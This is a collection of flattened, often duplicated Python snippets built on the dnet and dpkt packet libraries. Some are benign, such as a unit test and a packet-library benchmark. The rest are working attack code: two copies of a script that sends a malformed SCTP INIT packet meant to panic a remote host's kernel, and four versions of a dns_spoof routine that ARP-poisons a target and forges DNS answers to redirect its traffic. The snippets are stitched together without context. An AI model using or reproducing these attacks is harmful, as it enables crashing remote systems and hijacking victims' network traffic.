def Send(self): ip = dnet.ip() for pkt in self.packets: data = str(pkt) data = dnet.ip_checksum(data) ip.send(data) time.sleep(0.10)
def run(self): for i in xrange(1, SEQ_DELTA+1): self.tcp.seq += i for j in xrange(MAX_HOPS): self.ip.id = j self.ip.ttl = j buf = dnet.ip_checksum(str(self.ip)) self.sock.send(buf) time.sleep(0.001)
def test_ip_misc(self): n = '\x01\x02\x03\x04' a = '1.2.3.4' self.failUnless(dnet.ip_ntoa(n) == a) self.failUnless(dnet.ip_aton(a) == n) dst = '\x05\x06\x07\x08' hdr = dnet.ip_pack_hdr(0, dnet.IP_HDR_LEN, 666, 0, 255, dnet.IP_PROTO_UDP, n, dst) assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08' hdr = dnet.ip_checksum(hdr) assert hdr == 'E\x00\x00\x14\x02\x9a\x00\x00\xff\x11\xa9+\x01\x02\x03\x04\x05\x06\x07\x08'
def main(): if len(sys.argv) != 3: usage() host = sys.argv[1] port = int(sys.argv[2]) try: sock = dnet.ip() intf = dnet.intf() except OSError: err('requires root privileges for raw socket access') dst_addr = socket.gethostbyname(host) interface = intf.get_dst(dnet.addr(dst_addr)) src_addr = interface['addr'].ip msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port)) invalid = '' invalid += '\x20\x10\x11\x73' invalid += '\x00\x00\xf4\x00' invalid += '\x00\x05' invalid += '\x00\x05' invalid += '\x20\x10\x11\x73' for i in xrange(20): invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff' init = dpkt.sctp.Chunk() init.type = dpkt.sctp.INIT init.data = invalid init.len = len(init) sctp = dpkt.sctp.SCTP() sctp.sport = 0x1173 sctp.dport = port sctp.data = [init] ip = dpkt.ip.IP() ip.src = src_addr ip.dst = dnet.ip_aton(dst_addr) ip.p = dpkt.ip.IP_PROTO_SCTP ip.data = sctp ip.len = len(ip) print ` ip ` pkt = dnet.ip_checksum(str(ip)) sock.send(pkt) msg('kernel should have panicked on remote host %s' % (dst_addr))
def main(): if len(sys.argv) != 3: usage() host = sys.argv[1] port = int(sys.argv[2]) try: sock = dnet.ip() intf = dnet.intf() except OSError: err('requires root privileges for raw socket access') dst_addr = socket.gethostbyname(host) interface = intf.get_dst(dnet.addr(dst_addr)) src_addr = interface['addr'].ip msg('sending malformed SCTP INIT msg to %s:%s' % (dst_addr, port)) invalid = '' invalid += '\x20\x10\x11\x73' invalid += '\x00\x00\xf4\x00' invalid += '\x00\x05' invalid += '\x00\x05' invalid += '\x20\x10\x11\x73' for i in xrange(20): invalid += '\xc0\xff\x00\x08\xff\xff\xff\xff' init = dpkt.sctp.Chunk() init.type = dpkt.sctp.INIT init.data = invalid init.len = len(init) sctp = dpkt.sctp.SCTP() sctp.sport = 0x1173 sctp.dport = port sctp.data = [ init ] ip = dpkt.ip.IP() ip.src = src_addr ip.dst = dnet.ip_aton(dst_addr) ip.p = dpkt.ip.IP_PROTO_SCTP ip.data = sctp ip.len = len(ip) print `ip` pkt = dnet.ip_checksum(str(ip)) sock.send(pkt) msg('kernel should have panicked on remote host %s' % (dst_addr))
def dns_spoof(dev, source_mac, source, target=None, host=None, redirection=None): redirection = gethostbyname(redirection) sock = dnet.ip() pcap_filter = 'udp dst port 53' if target: pcap_filter += ' and src %s' % target print('[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W) # need to create a daemon that continually poison our target thread = Thread(target=poison, args=( dev, source_mac, source, target, 2, )) thread.daemon = True thread.start() pc = pcap.pcap(dev) pc.setfilter(pcap_filter) print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W) try: for ts, pkt in pc: eth = dpkt.ethernet.Ethernet(pkt) ip = eth.data udp = ip.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = host arr.ip = dnet.addr(redirection).ip # arr.ip = '\x4D\xEE\xB8\x96' dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src udp.data = dns udp.ulen = len(udp) ip.len = len(ip) print(inet_ntoa(ip.src)) buf = dnet.ip_checksum(str(ip)) sock.send(buf) except KeyboardInterrupt: print('[+] DNS spoofing interrupted\n\r') utils.set_ip_forward(0)
def dns_spoof(self, host=None, redirection=None): """ Redirect all incoming request for 'host' to 'redirection' """ pcap_filter = self._build_pcap_filter('udp dst port 53 and src ') redirection = gethostbyname(redirection) sock = dnet.ip() print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W + ' and ' + R + (','.join(self.target) if isinstance(self.target, list ) else self.target) + W + '\n') # need to create a daemon that continually poison our target poison_thread = Thread(target=self.poison, args=(2, )) poison_thread.daemon = True poison_thread.start() packets = pcap.pcap(self.dev) packets.setfilter(pcap_filter) print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + (','.join(self.target) if isinstance(self.target, list ) else self.target) + W) try: for _, pkt in packets: eth = dpkt.ethernet.Ethernet(pkt) ip_packet = eth.data udp = ip_packet.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host arr.ip = dnet.addr(redirection).ip dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src udp.data, udp.ulen = dns, len(udp) ip_packet.len = len(ip_packet) print(inet_ntoa(ip_packet.src)) buf = dnet.ip_checksum(str(ip_packet)) sock.send(buf) except KeyboardInterrupt: print('[+] DNS spoofing interrupted\n\r') self.restore(2) utils.set_ip_forward(0)
def dns_spoof(dev, source_mac, source, target = None, host = None, redirection = None): redirection = gethostbyname(redirection) sock = dnet.ip() filter = 'udp dst port 53' if target: filter += ' and src %s' % target print '[+] Start poisoning on ' + G + dev + W + ' between ' + G + source + W + ' and ' + R + target + W # need to create a daemon that continually poison our target thread = Thread(target = poison, args = (dev, source_mac, source, target, 2, )) thread.daemon = True thread.start() pc = pcap.pcap(dev) pc.setfilter(filter) print '[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + target + W try: for ts, pkt in pc: eth = dpkt.ethernet.Ethernet(pkt) ip = eth.data udp = ip.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls = dpkt.dns.DNS_IN arr.type = dpkt.dns.DNS_A arr.name = host arr.ip = dnet.addr(redirection).ip # arr.ip = '\x4D\xEE\xB8\x96' dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip.src, ip.dst = ip.dst, ip.src udp.data = dns udp.ulen = len(udp) ip.len = len(ip) print inet_ntoa(ip.src) buf = dnet.ip_checksum(str(ip)) try: sock.send(buf) except: pass except KeyboardInterrupt: print '[+] DNS spoofing interrupted\n\r' set_ip_forward(0)
def compare_create(cnt): """ dpkt: 14915.2445937 pps dpkt (manual): 15494.3632903 pps impacket: 3929.30572776 pps openbsd.packet: 1503.7928579 pps scapy: 348.449269721 pps xstruct: 88314.8953732 pps """ src = dnet.addr('1.2.3.4').ip dst = dnet.addr('5.6.7.8').ip data = 'hello world' start = time.time() for i in range(cnt): dnet.ip_checksum( str( dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP, len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data), data=dpkt.udp.UDP(sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data), data=data)))) print('dpkt:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): dnet.ip_checksum( str( dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP, len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data))) + str( dpkt.udp.UDP( sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data))) + data) print('dpkt (manual):', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): ip = ImpactPacket.IP() ip.set_ip_src('1.2.3.4') ip.set_ip_dst('5.6.7.8') udp = ImpactPacket.UDP() udp.set_uh_sport(111) udp.set_uh_dport(222) udp.contains(ImpactPacket.Data(data)) ip.contains(udp) ip.get_packet() print('impacket:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): p = packet.createPacket(packet.IP, packet.UDP) p['ip'].src = '1.2.3.4' p['ip'].dst = '5.6.7.8' p['udp'].sport = 111 p['udp'].dport = 22 p['udp'].payload = data p.finalise() p.getRaw() print('openbsd.packet:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): ip = scapy.IP(src='1.2.3.4', dst='5.6.7.8') / \ scapy.UDP(sport=111, dport=222) / data ip.build() print('scapy:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): udp = xudp() udp.sport = 111 udp.dport = 222 udp.ulen = dnet.UDP_HDR_LEN + len(data) ip = xip() ip.src = src ip.dst = dst ip.p = dnet.IP_PROTO_UDP ip.len = dnet.IP_HDR_LEN + udp.ulen dnet.ip_checksum(str(ip) + str(udp) + data) print('xstruct:', cnt / (time.time() - start), 'pps')
def compare_create(cnt): """ dpkt: 14915.2445937 pps dpkt (manual): 15494.3632903 pps impacket: 3929.30572776 pps openbsd.packet: 1503.7928579 pps scapy: 348.449269721 pps xstruct: 88314.8953732 pps """ src = dnet.addr('1.2.3.4').ip dst = dnet.addr('5.6.7.8').ip data = 'hello world' start = time.time() for i in range(cnt): dnet.ip_checksum( str(dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP, len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data), data=dpkt.udp.UDP(sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data), data=data)))) print('dpkt:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): dnet.ip_checksum(str(dpkt.ip.IP(src=src, dst=dst, p=dnet.IP_PROTO_UDP, len=dnet.IP_HDR_LEN + dnet.UDP_HDR_LEN + len(data))) + str(dpkt.udp.UDP(sport=111, dport=222, ulen=dnet.UDP_HDR_LEN + len(data))) + data) print('dpkt (manual):', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): ip = ImpactPacket.IP() ip.set_ip_src('1.2.3.4') ip.set_ip_dst('5.6.7.8') udp = ImpactPacket.UDP() udp.set_uh_sport(111) udp.set_uh_dport(222) udp.contains(ImpactPacket.Data(data)) ip.contains(udp) ip.get_packet() print('impacket:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): p = packet.createPacket(packet.IP, packet.UDP) p['ip'].src = '1.2.3.4' p['ip'].dst = '5.6.7.8' p['udp'].sport = 111 p['udp'].dport = 22 p['udp'].payload = data p.finalise() p.getRaw() print('openbsd.packet:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): ip = scapy.IP(src='1.2.3.4', dst='5.6.7.8') / \ scapy.UDP(sport=111, dport=222) / data ip.build() print('scapy:', cnt / (time.time() - start), 'pps') start = time.time() for i in range(cnt): udp = xudp() udp.sport = 111 udp.dport = 222 udp.ulen = dnet.UDP_HDR_LEN + len(data) ip = xip() ip.src = src ip.dst = dst ip.p = dnet.IP_PROTO_UDP ip.len = dnet.IP_HDR_LEN + udp.ulen dnet.ip_checksum(str(ip) + str(udp) + data) print('xstruct:', cnt / (time.time() - start), 'pps')
def dns_spoof(self, host=None, redirection=None): """ Redirect all incoming request for 'host' to 'redirection' """ pcap_filter = self._build_pcap_filter('udp dst port 53 and src ') redirection = gethostbyname(redirection) sock = dnet.ip() print('[+] Start poisoning on ' + G + self.dev + W + ' between ' + G + self.gateway + W + ' and ' + R + (','.join(self.target) if isinstance(self.target, list) else self.target) + W +'\n') # need to create a daemon that continually poison our target poison_thread = Thread(target=self.poison, args=(2, )) poison_thread.daemon = True poison_thread.start() packets = pcap.pcap(self.dev) packets.setfilter(pcap_filter) print('[+] Redirecting ' + G + host + W + ' to ' + G + redirection + W + ' for ' + R + (','.join(self.target) if isinstance(self.target, list) else self.target) + W) try: for _, pkt in packets: eth = dpkt.ethernet.Ethernet(pkt) ip_packet = eth.data udp = ip_packet.data dns = dpkt.dns.DNS(udp.data) # validate query if dns.qr != dpkt.dns.DNS_Q: continue if dns.opcode != dpkt.dns.DNS_QUERY: continue if len(dns.qd) != 1: continue if len(dns.an) != 0: continue if len(dns.ns) != 0: continue if dns.qd[0].cls != dpkt.dns.DNS_IN: continue if dns.qd[0].type != dpkt.dns.DNS_A: continue # spoof for our target name if dns.qd[0].name != host: continue # dns query->response dns.op = dpkt.dns.DNS_RA dns.rcode = dpkt.dns.DNS_RCODE_NOERR dns.qr = dpkt.dns.DNS_R # construct fake answer arr = dpkt.dns.DNS.RR() arr.cls, arr.type, arr.name = dpkt.dns.DNS_IN, dpkt.dns.DNS_A, host arr.ip = dnet.addr(redirection).ip dns.an.append(arr) udp.sport, udp.dport = udp.dport, udp.sport ip_packet.src, ip_packet.dst = ip_packet.dst, ip_packet.src udp.data, udp.ulen = dns, len(udp) ip_packet.len = len(ip_packet) print(inet_ntoa(ip_packet.src)) buf = dnet.ip_checksum(str(ip_packet)) sock.send(buf) except KeyboardInterrupt: print('[+] DNS spoofing interrupted\n\r') self.restore(2) utils.set_ip_forward(0)